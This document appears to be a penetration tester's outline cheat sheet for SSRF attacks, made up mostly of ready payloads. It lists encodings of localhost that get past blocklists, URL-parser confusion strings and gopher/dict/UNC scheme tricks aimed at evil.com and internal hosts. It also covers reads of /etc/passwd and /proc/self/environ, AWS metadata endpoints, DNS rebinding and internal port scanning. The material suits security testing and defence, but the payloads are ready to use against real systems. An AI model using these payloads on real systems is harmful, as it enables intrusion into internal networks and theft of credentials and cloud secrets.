1. Attacks
  1. DNS
  2. Schemes
  3. Where to find?
  4. Redirect
  5. Bypass block list
  6. File processing
    1. HTML/PDF/Image rendering
    2. SSRF via ffmpeg AVI/M3U8
    3. XXE: xml, docx, odt
    4. SSRF via SVG
    5. https://github.com/allanlw/svg-cheatsheet
  7. Reverse proxies / load balancers
    1. GET @evil.com HTTP/1.1
    2. Headers: Host, Referer, X-Forwarded-For
    3. "Cracking the Lens" by James Kettle
  8. Brute-force typical SSRF params (GET/POST)
    1. ?url=
    2. ?uri=
    3. ?link=
  9. URL preview
  10. Callbacks
  11. Upload image/file by URL
  12. Open redirect to allowed domain
    1. target.com/?url=http://127.0.0.1
  13. Bypass redirect protection
    1. Check various response codes: 201, 301, 302, 303, 307, 308
  14. Chain of redirects via controlled site
  15. Redirect with scheme change
    1. Location: gopher://127.0.0.1:11211/_data
  16. HTTP
    1. http:
    2. https:
  17. FTP
    1. ftp:
    2. tftp:
    3. sftp:
  18. UNC paths
    1. \\127.0.0.1\C$\Windows\win.ini
    2. \\evil.com\share
  19. Other
    1. jar:
    2. dict:
    3. gopher:
    4. ldap:
  20. Java only
  21. DNS rebinding
    1. Check tool: http://1u.ms/
  22. DNS pinning
    1. evil.com -> 127.0.0.1
    2. evil.com -> 169.254.169.254
  23. Bypass restrictions
    1. Internal API
    2. 403 restrictions
    3. Access to admin panel
  24. Attacks on SSRF client
    1. SSRF to XXE
    2. Fingerprint SSRF client
  25. Address encoding
    1. Octal: http://0177.0.0.01
    2. Decimal: http://2130706433/
    3. Hex: http://0x7f.0x0.0x0.0x1
    4. Mixed: http://0177.0x0.0x0.1
  26. Unicode normalization
    1. http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
  27. URL parser logic
    1. http://evil$google.com
    2. http://127.1.1.1:80\@127.2.2.2:80/
    3. http://127.1.1.1:80\@@127.2.2.2:80/
    4. 0://evil.com:80;http://google.com:80/
    5. "A New Era of SSRF: Exploiting URL Parser" by Orange Tsai
  28. File read
    1. /proc/self/environ
    2. C:/Windows/win.ini
    3. Application log files
    4. Application config files
  29. IPv6 address
    1. http://[::]:80
    2. http://0000::1:80/
    3. http://::1/server-status
  30. Localhost representation
    1. http://0/
    2. http://127.1
    3. http://0.0.0.0
    4. http://127.127.127.127
  31. NetNTLM hash leakage
  32. Almost deprecated
  33. File read
    1. file:///etc/passwd
    2. netdoc:///etc/passwd
  34. Redirect via controlled site
    1. Location: http://127.0.0.1
  35. If metadata v1 enabled
  36. Cloud meta API
    1. AWS
      1. 169.254.169.254/latest/user-data
      2. 169.254.169.254/latest/meta-data/hostname
      3. 169.254.169.254/latest/meta-data/ami-id
    2. Check target IP to find out cloud provider
  37. SSRF to XSS
  38. Known public DNS pinnings
    1. localtest.me
    2. 169.254.169.254.xip.io
    3. spoofed.burpcollaborator.net
    4. Find target domain with an A record of 127.0.0.1
  39. Internal network recon
    1. Port scanning using errors or time delay
    2. Fingerprint known HTTP services
    3. Blind SSRF port scanning via DNS
    4. "Blind SSRF Exploitation" by Wallarm